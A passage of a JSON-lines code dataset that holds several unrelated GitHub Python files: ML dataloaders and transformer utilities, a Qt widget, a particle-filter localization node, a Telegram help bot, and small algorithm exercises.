num_workers=cfg.SYSTEM.NUM_WORKERS, \n pin_memory=True, \n drop_last=True,\n # worker_init_fn=worker_init_fn\n )\n elif mode == 'unlabeled':\n dts = ImageDataset(cfg=cfg, \n roots=data_root, \n mode=mode, \n train_size=train_size,\n crop_size=crop_size, \n scale=scale,\n weak_aug=weak_aug,\n semi_training=semi_training,\n add_adeptive_noise=add_adeptive_noise,\n focus_add_adeptive_noise=focus_add_adeptive_noise,\n max_pixel_detla=max_pixel_detla,\n sup_color_aug_probs=sup_color_aug_probs,\n sup_offset_aug_probs=sup_offset_aug_probs,\n aug_offline_path=aug_offline_path,\n )\n dataloader = DataLoader(dts, \n shuffle=True,\n batch_size=cfg.TRAIN.UNLABELED_BATCH_SIZE,\n num_workers=cfg.SYSTEM.NUM_WORKERS, \n pin_memory=True, \n drop_last=True,\n # worker_init_fn=worker_init_fn\n ) \n elif mode == 'valid':\n dts = ImageDataset(cfg=cfg, \n roots=data_root, \n mode='val', \n train_size=train_size, \n scale=scale,\n add_adeptive_noise=False,\n max_pixel_detla=0.,\n sup_color_aug_probs=0.,\n sup_offset_aug_probs=0., \n aug_offline_path=aug_offline_path,\n )\n dataloader = DataLoader(dts, \n batch_size=cfg.VAL.BATCH_SIZE,\n shuffle=False, \n drop_last=False,\n num_workers=cfg.SYSTEM.NUM_WORKERS)\n elif mode == 'test':\n dts = ImageDataset(cfg=cfg, \n roots=data_root, \n mode=mode, \n train_size=train_size, \n scale=scale,\n add_adeptive_noise=False,\n max_pixel_detla=0.,\n sup_color_aug_probs=0.,\n sup_offset_aug_probs=0., \n aug_offline_path=aug_offline_path,\n )\n dataloader = DataLoader(dts, \n batch_size=cfg.TEST.BATCH_SIZE,\n shuffle=False, \n drop_last=False,\n num_workers=cfg.SYSTEM.NUM_WORKERS)\n else:\n raise KeyError(f\"mode error: {mode}\")\n return dataloader\n","repo_name":"RyleeQI/NUNI-Waste","sub_path":"zerowaste/SemiSeg/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":20332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71333268036","text":"#%%\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom common_fn import *\n#%% Reading input for GFP and RFP intensity\ngfp = pd.read_excel('../input/set 3 coculture compiled.xlsx',sheet_name='GFP')\nrfp = pd.read_excel('../input/set 3 coculture compiled.xlsx',sheet_name='RFP')\n#%% Total no. of initial cells\nn = 3000\n#%% Proportions of gfp & rfp\ngfp_prop = np.array([0.95,0.95,0.05,0.05,0.25,0.25,0.75,0.75,0.5,0.5,1])\nrfp_prop = 1 - gfp_prop\nrfp_prop[np.where(rfp_prop == 0)] = 1\n# %% Select Intensity readings for Day 0\ngfp_I = gfp.iloc[0,1:].values\nrfp_I = rfp.iloc[0,1:].values\n# %% Sensitive\nplot_NvsI(gfp_I[0:11],rfp_I[0:11],gfp_prop,rfp_prop,n,'Sensitive')\n# %% Resistant\nplot_NvsI(gfp_I[11:22],rfp_I[11:22],gfp_prop,rfp_prop,n,'Resistant')\n# %%\n","repo_name":"Harshavardhan-BV/OVC-PopDyn","sub_path":"analysis/CellNvsI.py","file_name":"CellNvsI.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16431619178","text":"from PySide6.QtCore import Qt, QTranslator, Signal\nfrom PySide6.QtGui import QKeyEvent\nfrom qfluentwidgets import PlainTextEdit\n\nfrom setting.setting_reader import setting\n\n\nclass CommandTextEdit(PlainTextEdit):\n \"\"\"A text edit widget that supports search mode and chat mode.\"\"\"\n\n CONFIRM_SIGNAL = Signal(str) # signal emitted when user press enter\n GO_BEYOND_END_OF_DOCUMENT_SIGNAL = Signal() # signal emitted when user press down arrow key at the last line\n\n PADDING = 10 # distance in pixels between border to edit area\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n self.enter_search_mode()\n self.setup_ui()\n\n @property\n def height_by_content(self):\n \"\"\"return the height of the widget in pixels\n NOTE: PlainTextEdit.document().size().height() returns line number, not the actual height of the widget.\n TextEdit.document().size().height() returns the actual height of the widget.\n \"\"\"\n line_count = 1 if self.document().lineCount() == 0 else self.document().lineCount()\n return self.fontMetrics().lineSpacing() * line_count + self.PADDING * 2 + 10\n\n def setup_ui(self):\n self.setFont(setting.default_font)\n self.setStyleSheet(\n f\"\"\"\n padding: {self.PADDING}px; \n background-color:white;\n \"\"\"\n )\n\n def reset_widget(self):\n self.clear()\n self.enter_search_mode()\n\n def enter_talk_mode(self):\n \"\"\"user is typing in the message box to talk to AI.\"\"\"\n self.setReadOnly(False)\n self.setFocus()\n self.setPlaceholderText(QTranslator.tr(\"Type to talk to AI.\"))\n self.viewport().repaint()\n\n def enter_llm_responding_mode(self):\n \"\"\"llm is responding to user message\"\"\"\n self.setReadOnly(True)\n\n def enter_search_mode(self):\n self.setReadOnly(False)\n self.setFocus()\n self.setPlaceholderText(\n QTranslator.tr(\n \"Type to search for prompts, chat histories or applications, or start talking to AI.\",\n )\n )\n self.viewport().repaint()\n\n def keyPressEvent(self, event: QKeyEvent) -> None:\n text = self.toPlainText()\n enter_pressed = event.key() == Qt.Key_Enter or event.key() == Qt.Key_Return\n if enter_pressed and event.modifiers() == Qt.ShiftModifier:\n self.insertPlainText(\"\\n\")\n return\n elif enter_pressed:\n if not text.strip():\n return\n self.CONFIRM_SIGNAL.emit(text)\n return\n elif event.key() == Qt.Key_Down:\n # if cursor is already at the last line, emit signal\n if self.textCursor().blockNumber() == self.document().blockCount() - 1:\n self.GO_BEYOND_END_OF_DOCUMENT_SIGNAL.emit()\n # let command window to handle ctrl+c when user does not select anything\n elif event.key() == Qt.Key_C and event.modifiers() == Qt.ControlModifier:\n if not self.textCursor().hasSelection():\n self.parent().keyPressEvent(event)\n return\n super().keyPressEvent(event)\n\n def _adjust_height(self):\n \"\"\"adjust height to fit the content\"\"\"\n self.setMinimumHeight(self.fontMetrics().lineSpacing() * self.document().blockCount() + 10 + self.PADDING * 2)\n self.adjustSize()\n","repo_name":"Shawn91/ProPal","sub_path":"frontend/components/command_text_edit.py","file_name":"command_text_edit.py","file_ext":"py","file_size_in_byte":3399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23627839921","text":"#!/usr/bin/env python\n# google code jam 2011\n# round 1c, problem c\n# Joseph Lee \n# 5/22/11\n\nimport sys\n\ndef main(name_in, name_out):\n infile = open(name_in, 'r').read().strip().split('\\n')[1:] # input 1st arg\n if name_out != None:\n outfile = open(name_out, 'w') # output file, 2nd cmd-line arg\n else:\n outfile=sys.stdout\n casenum=1\n while len(infile) > 0:\n N, L, H=infile.pop(0).strip().split(' ')\n N=int(N)\n L=int(L)\n H=int(H)\n temp=infile.pop(0).strip().split(' ')\n Nlist=[]\n while len(temp) > 0:\n Nlist.append(int(temp.pop(0)))\n outfile.write('Case #%d: %s\\n'%(casenum, test_case(L, H, Nlist)))\n casenum=casenum+1\n if outfile != sys.stdout:\n outfile.close()\n return 0\n\n# main test case calculation method\ndef test_case(L, H, Nlist):\n c=L\n while c <= H:\n count=0 # non-harmony count\n for i in Nlist:\n if i > c:\n if i % c != 0:\n count+=1\n else:\n if c % i != 0:\n count +=1\n if count == 0:\n return str(c)\n c+=1\n return 'NO'\n\n\n# parse input from command line\ndef parse_input(test_in):\n return None\n\n\n\nif __name__=='__main__':\n name_in=sys.argv[1]\n if len(sys.argv) >= 3:\n name_out=sys.argv[2]\n else:\n name_out=None\n main(name_in, name_out)\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_86/190.py","file_name":"190.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31827390326","text":"\"\"\"\nSometimes a graph is split into multiple components.\nIt's useful to be able to identify and count these components.\n\"\"\"\n\n\"\"\"\nWe can use a dfs to identify components 1st , make sure all the nodes are labeled from [0,n)\nwhere n is the no. of nodes.\n\nAlgo:\nStart dfs at every node (except if it's already been visited) and make all reachable nodes as being part\nof some component.\n\"\"\"\n\nn = 18 # No. of nodes in the graphs\ng = {\n 0: [13, 14, 8, 4],\n 1: [5],\n 2: [15, 9],\n 3: [9],\n 4: [8, 0],\n 5: [1, 17, 16],\n 6: [7, 11],\n 7: [6, 11],\n 8: [4, 0, 14],\n 9: [3, 15, 2],\n 10: [15],\n 11: [6, 7],\n 12: [],\n 13: [14, 0],\n 14: [8, 0, 13],\n 15: [10, 2, 9],\n 16: [5],\n 17: [5],\n}\n# Adjacency list representation of the graph\n\ncount = 0\ncomponents = [0] * n\nvisited = [False] * n\n\n\ndef find_components():\n global count\n global components\n for i in range(n):\n if not visited[i]:\n count += 1\n dfs(i)\n return (count, components)\n\n\ndef dfs(at):\n visited[at] = True\n components[at] = count\n for next in g[at]:\n if not visited[next]:\n dfs(next)\n\n\nprint(find_components())\n","repo_name":"UdayKiranPadhy/DS-And-Algo","sub_path":"Data Structures/Graphs/2-DFS in Connected Components.py","file_name":"2-DFS in Connected Components.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"32192442088","text":"import cross_validator\nimport pandas as pd\nfrom config import settings\n\n\ndef main():\n\n all_results_df = pd.DataFrame()\n\n number_of_models = 5\n for i in range(number_of_models):\n weights_folder = 'general{}'.format(i+1)\n model_weights = 'all'\n model_results_df = cross_validator.main(model_weights, weights_folder=weights_folder)\n all_results_df = all_results_df.append(model_results_df)\n\n print(all_results_df)\n all_results_df.to_csv('{}/test_scores/test_scores_generalmodels.csv'.format(settings.output_dir))\n\n\nif __name__ == '__main__':\n main()","repo_name":"shourd/SectorX_analysis","sub_path":"general_model_validator.py","file_name":"general_model_validator.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4487841633","text":"#!/usr/bin/env python\n\nimport unittest\nfrom utils import binary_tree\n\n\ndef traverse(n):\n if not n:\n return\n\n yield from traverse(n.left)\n yield n.val\n yield from traverse(n.right)\n\n\nclass MyTest(unittest.TestCase):\n def test_1(self):\n arr = [5, 3, 6, 2, 4, None, None, 1]\n root = binary_tree.make_tree(arr)\n result = list(traverse(root))\n self.assertEqual([1, 2, 3, 4, 5, 6], result)\n","repo_name":"altoid/utils","sub_path":"tests/binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73224836675","text":"#!/usr/bin/env python3\n\nimport rospy\nimport motion\nimport sensor\nimport particles\nimport util\n\nimport numpy as np\n\nfrom nav_msgs.msg import Odometry\nfrom tf.transformations import euler_from_quaternion\nimport copy\n\n\nif __name__==\"__main__\":\n rospy.init_node(\"mcl_p\")\n dt = 0.05\n rate = rospy.Rate(1/dt)\n\n util = util.Util()\n\n par_num = 200\n particles = particles.Particles(par_num)\n sensor = sensor.SensorModel(\"LikelihoodField/likelihood_field_sigma_2\")\n motion = motion.MotionModel(dt)\n\n # get the current position\n current_pose = rospy.wait_for_message(\"/odom\",Odometry)\n c_pose = current_pose.pose.pose\n\n # turn Odom into dict of x, y, theta\n init_pose = dict()\n init_pose[\"x\"] = c_pose.position.x\n init_pose[\"y\"] = c_pose.position.y\n orient_list = [c_pose.orientation.x,c_pose.orientation.y,c_pose.orientation.z,c_pose.orientation.w]\n init_pose[\"theta\"] = euler_from_quaternion(orient_list)[2]\n\n # initialize particles around current pose\n particles.ResampleAllParticlesAroundPose(init_pose)\n\n resample_lin_sigma = 0.2\n resample_ang_sigma = 0.1\n\n counter = 1\n\n while not rospy.is_shutdown():\n # publish particle pose\n particles.PublishParticles()\n\n if counter >= 100000:\n counter = 1\n\n if counter % 20 == 0 and motion.getMoving():\n ##########################\n # Particle Update Weight #\n ##########################\n '''\n :put new weight into particle class\n '''\n sum_likelihood = 0\n for i in range(par_num):\n likelihood = sensor.CalcPoseSmoothedLikelihood(particles.getParticle(i))\n sum_likelihood += likelihood\n particles.setWeight(i,likelihood)\n\n #######################\n # Particle Resampling #\n #######################\n '''\n Resample all the particles according to the weight\n When a particle is selected, resample it with noise\n '''\n step = 1/par_num\n u = np.random.uniform(0,step)\n c = particles.getWeight(0)/sum_likelihood\n\n i = 0\n new_particles = []\n for j in range(par_num):\n while u>c:\n i+=1\n c+=particles.getWeight(i)/sum_likelihood\n new_particle = particles.ResampleParticleAroundPose(copy.deepcopy(particles.getParticle(i)),resample_lin_sigma,resample_ang_sigma)\n new_particles.append(new_particle)\n u+=step\n\n particles.setParticles(new_particles)\n\n # Predict Motion\n '''put new position into particle class'''\n # motion.UpdateVelocity()\n for i in range(par_num):\n new_par_pos = motion.PredictMotionCmd(\n particles.getParticle(i))\n particles.setParticle(i,new_par_pos)\n\n counter += 1\n rate.sleep()\n","repo_name":"SCzhJ/particle-filter-localization","sub_path":"src/bot_sim/scripts/Particle Filter Localization/MCL.py","file_name":"MCL.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25748880713","text":"#!/usr/bin/env python3.6\n\nimport pickle\nimport pandas as pd\nimport sys\n\ndirectory = '/mnt/home/jbielecki1/NEMA/10000000/'\nmax_depth = int(sys.argv[1])\nmodelFileName = 'ADA/adaEstimators1000Depth' + str(max_depth)\n\nmodel = pickle.load(open(directory + modelFileName, 'rb'))\nX_test = pickle.load(open(directory + 'xTest', 'rb'))\ny_test = pickle.load(open(directory + 'yTest', 'rb'))\nclass_test = y_test[[\"class\"]].values\ny_test = y_test[['newClass']].values\ny_pred_prob = model.predict_proba(X_test)[:,1]\ny_pred = y_pred_prob > 0.5\nbestNEstimators = 1000\n\ndef groupPerThreshold(X_test, y_test, y_pred_prob, modelName, resolution = 100):\n X_test = X_test\n points = pd.DataFrame(columns = [\"Threshold\", \"FP\", \"TP\", \"TN\", \"FN\"])\n pPsOrginalPositive = X_test[y_test > 0]\n pPsOrginalNegative = X_test[y_test == 0]\n minProb = min(y_pred_prob)\n maxProb = max(y_pred_prob)\n \n for i in range(resolution + 1):\n threshold = minProb + (maxProb-minProb)*float(i)/float(resolution)\n y_pred = y_pred_prob > threshold\n pPsPredictedPositive = X_test[y_pred == 1]\n pPsPredictedNegative = X_test[y_pred == 0]\n\n points = points.append({\n \"Threshold\": threshold,\n \"FP\": len(pd.merge(pPsPredictedPositive,pPsOrginalNegative, how='inner')),\n \"TP\": len(pd.merge(pPsPredictedPositive,pPsOrginalPositive, how='inner')),\n \"TN\": len(pd.merge(pPsPredictedNegative,pPsOrginalNegative, how='inner')),\n \"FN\": len(pd.merge(pPsPredictedNegative,pPsOrginalPositive, how='inner')),\n }, ignore_index = True)\n \n points.to_csv(directory + modelName + 'GroupPerThreshold' + str(bestNEstimators) + \"d\" + str(max_depth), sep = \"\\t\", header = False, index = False)\n return points\n\npoints100 = groupPerThreshold(X_test, y_test, y_pred_prob, modelName = 'ADA')","repo_name":"K4liber/MultiphotonClassification","sub_path":"Classification/NemaSource/adaGroups.py","file_name":"adaGroups.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23624810981","text":"from fractions import Fraction\n\nfor case in range(1, int(input()) + 1):\n N = int(input())\n teams = [input() for _ in range(N)]\n\n ws = [t.count('1') for t in teams]\n gs = [len(t) - t.count('.') for t in teams]\n\n wp = [Fraction(ws[i], gs[i]) for i in range(N)]\n\n owp = []\n for i, t in enumerate(teams):\n p = 0\n for j, o in enumerate(t):\n if o == '.':\n continue\n p += Fraction(ws[j] - int(t[j] == '0'), gs[j] - 1)\n owp.append(p / gs[i])\n\n oowp = []\n for i, t in enumerate(teams):\n oowp.append(sum(owp[j] for j in range(N) if t[j] != '.') / gs[i])\n\n print('Case #%d:' % case)\n for n in range(N):\n print(.25 * wp[n] + .5 * owp[n] + .25 * oowp[n])\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_81/260.py","file_name":"260.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37199920191","text":"from django.test import TestCase, Client\n\n\ndef extract_uid(v):\n return v.split(\"My unique ID is: \")[1].split(\".\")[0]\n\n\nclass TestRoot(TestCase):\n def test_root(self):\n c = Client()\n\n v = extract_uid(c.get(\"/\").rendered_content)\n self.assertEquals(len(v), 36)\n\n w = extract_uid(c.get(\"/\").rendered_content)\n self.assertEquals(len(w), 36)\n\n self.assertNotEquals(v, w)\n","repo_name":"mpasternak/django-template-uuid","sub_path":"test_project/test_app/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"19081392912","text":"'''\r\n문제\r\n적록색약은 빨간색과 초록색의 차이를 거의 느끼지 못한다. \r\n따라서, 적록색약인 사람이 보는 그림은 아닌 사람이 보는 그림과는 좀 다를 수 있다.\r\n\r\n크기가 N×N인 그리드의 각 칸에 R(빨강), G(초록), B(파랑) 중 하나를 색칠한 그림이 있다. \r\n그림은 몇 개의 구역으로 나뉘어져 있는데, 구역은 같은 색으로 이루어져 있다. \r\n또, 같은 색상이 상하좌우로 인접해 있는 경우에 두 글자는 같은 구역에 속한다. \r\n(색상의 차이를 거의 느끼지 못하는 경우도 같은 색상이라 한다)\r\n\r\n예를 들어, 그림이 아래와 같은 경우에\r\n\r\nRRRBB\r\nGGBBB\r\nBBBRR\r\nBBRRR\r\nRRRRR\r\n적록색약이 아닌 사람이 봤을 때 구역의 수는 총 4개이다. \r\n(빨강 2, 파랑 1, 초록 1) 하지만, 적록색약인 사람은 구역을 3개 볼 수 있다. (빨강-초록 2, 파랑 1)\r\n\r\n그림이 입력으로 주어졌을 때, 적록색약인 사람이 봤을 때와 아닌 사람이 봤을 때 구역의 수를 구하는 프로그램을 작성하시오.\r\n\r\n입력\r\n첫째 줄에 N이 주어진다. (1 ≤ N ≤ 100)\r\n\r\n둘째 줄부터 N개 줄에는 그림이 주어진다.\r\n\r\n출력\r\n적록색약이 아닌 사람이 봤을 때의 구역의 개수와 적록색약인 사람이 봤을 때의 구역의 수를 공백으로 구분해 출력한다.\r\n'''\r\nimport sys\r\n\r\n# sys.setrecursionlimit(10**7) \r\n\r\nN = int(sys.stdin.readline())\r\nl = []\r\nfor i in range(N):\r\n ch_list = list(sys.stdin.readline())\r\n l.append(ch_list)\r\n\r\n# l_RG = [ [ l[i][j] for j in range(N)] for i in range(N)]\r\nl_RG = [ [None for _ in range(N)] for _ in range(N) ]\r\nfor i in range(N):\r\n for j in range(N):\r\n if l[i][j] == 'B': # B -> B\r\n l_RG[i][j] = 'B'\r\n else: # R, G -> R\r\n l_RG[i][j] = 'R'\r\n\r\n\r\n# for i in range(N):\r\n# print(l[i])\r\n\r\n# move\r\nd_x = [+1, 0, -1, 0]\r\nd_y = [0, +1, 0, -1]\r\n\r\n# DFS 로 해결\r\ndef dfs(l, pos, current):\r\n y = pos[0]\r\n x = pos[1]\r\n \r\n for k in range(4):\r\n n_x = x + d_x[k]\r\n n_y = y + d_y[k]\r\n if 0 <= n_x < N and 0 <= n_y < N:\r\n if l[n_y][n_x] == current: # if not visited\r\n n_current = l[n_y][n_x]\r\n l[n_y][n_x] = 0 # visited marking\r\n dfs(l, [n_y, n_x], n_current)\r\n\r\ncnt1 = 0\r\ncnt2 = 0\r\nfor i in range(N):\r\n for j in range(N):\r\n if l[i][j] != 0: # 탐색한 곳은 모두 0으로 고칠 예정.\r\n cnt1 += 1 # cnt incresing\r\n current = l[i][j]\r\n l[i][j] = 0\r\n dfs(l, [i, j], current)\r\n\r\n\r\nfor i in range(N):\r\n for j in range(N):\r\n if l_RG[i][j] != 0: # 탐색한 곳은 모두 0으로 고칠 예정.\r\n cnt2 += 1 # cnt incresing\r\n current = l_RG[i][j]\r\n l_RG[i][j] = 0\r\n dfs(l_RG, [i, j], current)\r\n\r\nprint(cnt1, cnt2)\r\n","repo_name":"Choi-winner/Baekjoon_Python","sub_path":"BOJ10026.py","file_name":"BOJ10026.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39415581670","text":"from typing import Text\nfrom aiogram.types import file, message\nfrom aiogram.utils.callback_data import CallbackData\nfrom aiogram import Bot, Dispatcher, executor, types\nfrom contextlib import suppress\nfrom aiogram.utils.exceptions import MessageNotModified\n\n\nimport config\nimport logging\nimport datetime\n\nAPI_TOKEN = config.TOKEN\nuser_data = {}\n\nlogging.basicConfig(\n level=logging.DEBUG,\n filename=f\"logi\\mylog{datetime.date.today()}.log\",\n format=\"%(asctime)s - %(module)s - %(levelname)s - %(funcName)s: %(lineno)d - %(message)s\",\n datefmt='%d.%m.%Y %H:%M:%S',\n)\n\nlogging.info('Hello')\n\n# Initialize bot and dispatcher\nbot = Bot(token=API_TOKEN)\ndp = Dispatcher(bot)\n\n# fabnum - префикс, action - название аргумента, которым будем передавать значение\ncallback_tema = CallbackData(\"fabnum\", \"action\")\n\ndef get_keyboard_fab():\n buttons = [\n types.InlineKeyboardButton(\n text=\"МТ\", callback_data=callback_tema.new(action=\"one_button\")),\n types.InlineKeyboardButton(\n text=\"Супервайзер\", callback_data=callback_tema.new(action=\"two_button\")),\n types.InlineKeyboardButton(\n text=\"Аналитик\", callback_data=callback_tema.new(action=\"three_button\")),\n types.InlineKeyboardButton(\n text=\"Статистика\", callback_data=callback_tema.new(action=\"finish\"))\n ]\n keyboard = types.InlineKeyboardMarkup(row_width=2)\n keyboard.add(*buttons)\n return keyboard\n\n\nasync def update_num_text_fab(message: types.Message, new_value: int):\n with suppress(MessageNotModified):\n await message.edit_text(f\"Вы выбрали тему: {new_value} раз.\", reply_markup=get_keyboard_fab())\n\n\n@dp.message_handler(commands=\"go\")\nasync def cmd_numbers(message: types.Message):\n user_data[message.from_user.id] = 0\n await message.answer(\"Выберите тему по которой вам необходима помощь:\", reply_markup=get_keyboard_fab())\n\n\n@dp.callback_query_handler(callback_tema.filter(action=[\"two_button\", \"one_button\", \"three_button\"]))\nasync def callbacks_num_change_fab(call: types.CallbackQuery, callback_data: dict):\n user_value = user_data.get(call.from_user.id, 0)\n action = callback_data[\"action\"]\n if action == \"two_button\":\n user_data[call.from_user.id] = user_value + 1\n await update_num_text_fab(call.message, user_value + 1)\n elif action == \"one_button\":\n user_data[call.from_user.id] = user_value + 1\n await update_num_text_fab(call.message, user_value + 1)\n elif action == \"three_button\":\n user_data[call.from_user.id] = user_value + 1\n await update_num_text_fab(call.message, user_value + 1)\n await call.answer()\n\n\n@dp.callback_query_handler(callback_tema.filter(action=[\"finish\"]))\nasync def callbacks_num_finish_fab(call: types.CallbackQuery):\n user_value = user_data.get(call.from_user.id, 0)\n await call.message.edit_text(f\"Ты ткнул по кнопочкам: {user_value} раз\")\n await call.answer()\n\n\n@dp.message_handler(commands=['start', \"start@My_best_aw_bot\"])\nasync def send_welcome(message: types.Message):\n await message.reply(\"Привет! Ты можешь задать вопрос прямо в чате, если тебе нужна справка напиши /info.\\nЕсли не помогло напиши /help\")\n\n\n@dp.message_handler(commands=['info', \"info@My_best_aw_bot\"])\nasync def send_info(message: types.Message):\n await message.reply(\"Это справочный бот который сможет ответить на самые часто задаваемые вопросы:\\nДля для поиска нужной подсказки напиши /go в чате или в личном сообщении боту.\\nЧтобы задать вопрос специалисту, напиши /help в начале сообщения.\")\n\n\n@dp.message_handler(commands=['help', \"help@My_best_aw_bot\"])\nasync def send_help(message: types.Message):\n voprositel = \"П��ивет, \" + \\\n str(message.from_user.first_name) + \\\n \", с тобой скоро свяжется специалист!\"\n await message.reply(voprositel)\n await message.forward(config.helper_user, message)\n\n \nif __name__ == '__main__':\n executor.start_polling(dp, skip_updates=True)\n","repo_name":"MrGlum/TeleBot_support","sub_path":"Aiobot.py","file_name":"Aiobot.py","file_ext":"py","file_size_in_byte":4412,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31226328531","text":"command_list = list(input().split(\"|\"))\nenergy = 100\ncoins = 100\n\nis_day_completed = True\n\nfor el in command_list:\n current_command = el.split(\"-\")\n command = str(current_command[0])\n value = int(current_command[1])\n\n if command == \"rest\":\n if energy + value > 100:\n needed_energy = 100 - energy\n print(f\"You gained {needed_energy} energy.\")\n energy = 100\n elif energy + value <= 100:\n print(f\"You gained {value} energy.\")\n energy += value\n print(f\"Current energy: {energy}.\")\n\n elif command == \"order\":\n if energy >= 30:\n energy -= 30\n coins += value\n print(f\"You earned {value} coins.\")\n else:\n if energy + 50 <= 100:\n energy += 50\n else:\n energy = 100\n print(f\"You had to rest!\")\n else:\n if coins >= value:\n coins -= value\n print(f\"You bought {command}.\")\n else:\n is_day_completed = False\n print(f\"Closed! Cannot afford {command}.\")\n break\n\nif is_day_completed:\n print(f\"Day completed!\")\n print(f\"Coins: {coins}\")\n print(f\"Energy: {energy}\")\n","repo_name":"Iliyan-H-Iliev/Python","sub_path":"Fundamentals/List_Basic/bread_factory.py","file_name":"bread_factory.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4493681625","text":"import numpy as np\nimport tensorflow as tf\n\ndef get_token_embeddings(vocab_size, num_node, zero_pad=True):\n with tf.variable_scope(\"shared_weight_matrix\"):\n embeddings = tf.get_variable('weight_mat',\n dtype=tf.float32,\n shape=(vocab_size, num_node),\n initializer=tf.contrib.layers.xavier_initializer())\n if zero_pad:\n embeddings = tf.concat((tf.zeros(shape=[1, num_node]),\n embeddings[1:, :]), 0)\n return embeddings\n\ndef positional_encoding(input, max_len, masking=True, scope='positional_encoding'):\n E = input.get_shape().as_list()[-1]\n N, T = tf.shape(input)[0], tf.shape(input)[1]\n \n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n position_idx = tf.tile(tf.expand_dims(tf.range(T), 0), [N, 1])\n position_encoder = np.array([\n [pos / np.power(10000, (i-i%2)/E) for i in range(E)] for pos in range(max_len)])\n\n position_encoder[:, 0::2] = np.sin(position_encoder[:, 0::2]) # dim 2i\n position_encoder[:, 1::2] = np.cos(position_encoder[:, 1::2]) # dim 2i+1\n position_encoder = tf.convert_to_tensor(position_encoder, tf.float32) # (maxlen, E)\n\n res = tf.nn.embedding_lookup(position_encoder, position_idx)\n \n res = tf.to_float(res)\n return res\n\ndef mask(input, key=None, type=None):\n padding = -2**32 -1\n if type=='keys':\n key_mask = tf.to_float(key)\n key_mask = tf.tile(key_mask, [tf.shape(input)[0] // tf.shape(key_mask)[0], 1])\n key_mask = tf.expand_dims(key_mask, 1)\n res = input + key_mask * padding\n elif type=='future':\n diag = tf.ones_like(input[0, :, :])\n temp = tf.linalg.LinearOperatorLowerTriangular(diag).to_dense()\n mask = tf.tile(tf.expand_dims(temp, 0), [tf.shape(input)[0], 1, 1])\n pad = tf.ones_like(mask) * padding\n res = tf.where(tf.equal(mask, 0), pad, input)\n\n return res\n\ndef self_attention(q, k, v, key, scope='self_attention'):\n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n d_k = q.get_shape().as_list()[-1]\n output = tf.matmul(q, tf.transpose(k, [0, 2, 1])) # (N, T_q, T_k)\n output /= d_k ** 0.5\n\n # key masking\n output = mask(output, key_masks=key, type=\"key\")\n\n # softmax\n output = tf.nn.softmax(output)\n attention = tf.transpose(output, [0, 2, 1])\n tf.summary.image(\"attention\", tf.expand_dims(attention[:1], -1))\n\n res = tf.matmul(output, v)\n\n return res\n\ndef multihead_attention(q, k, v, key, num_head=8, scope='multihead_attention'):\n d_model = q.get_shape().as_list()[-1]\n\n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n Q = tf.layers.dense(q, d_model, use_bias=True)\n K = tf.layers.dense(k, d_model, use_bias=True)\n V = tf.layers.dense(v, d_model, use_bias=True)\n\n queries = tf.concat(tf.split(Q, num_head, axis=2), axis=0)\n keys = tf.concat(tf.split(K, num_head, axis=2), axis=0)\n values = tf.concat(tf.split(V, num_head, axis=2), axis=0)\n\n # attention\n res = self_attention(queries, keys, values, key)\n\n #reshape\n res = tf.concat(tf.split(res, num_head, axis=0), axis=2)\n # add & norm\n res += queries\n res = layer_norm(res)\n\n return res\n\ndef feed_forward(input, num_node, scope='feed_forward'):\n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n nn = tf.layers.dense(input, num_node[0], activation=tf.nn.relu)\n nn = tf.layers.dense(nn, num_node[1])\n nn += input # residual connection\n res = layer_norm(nn)\n return res\n\ndef layer_norm(input, epsilon=1e-6, scope='ln'):\n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n input_shape = input.get_shape()\n params_shape = input_shape[-1:]\n \n mean, variance = tf.nn.moments(input, [-1], keep_dims=True)\n beta = tf.get_variable(\"beta\", params_shape, initializer=tf.zeros_initializer())\n gamma = tf.get_variable(\"gamma\", params_shape, initializer=tf.ones_initializer())\n normalized = (input - mean) / ( (variance + epsilon) ** (.5) )\n res = gamma * normalized + beta\n\n return 